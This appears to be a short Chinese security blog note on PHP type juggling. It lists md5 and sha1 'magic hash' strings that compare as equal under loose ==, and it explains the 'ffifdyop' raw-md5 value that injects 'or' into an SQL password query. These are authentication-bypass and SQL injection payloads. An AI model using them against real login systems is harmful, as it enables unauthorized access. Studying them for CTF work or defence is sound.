var_dump(md5(‘240610708’) == md5(‘QNKCDZO’));
var_dump(md5(‘aabg7XSs’) == md5(‘aabC9RqS’));
var_dump(sha1(‘aaroZmOk’) == sha1(‘aaK1STfY’));
var_dump(sha1(‘aaO8zKZF’) == sha1(‘aa3OFF9m’));
var_dump(‘0010e2’ == ‘1e3’);
var_dump(‘0x1234Ab’ == ‘1193131’);
var_dump(‘0xABCdef’ == ’ 0xABCdef’);
0e开头
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a
可构造’or’6<乱码>
字符串:ffifdyop
md5
加密后:276f722736c95d99e921722cf9ed621c
再转换为字符串:'or’6<乱码>
那么,拼接后的语句为:select * from admin where password=’‘or’6<乱码>’ ,就相当于select * from admin where password=’'or 1 ,实现sql注入。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客!
评论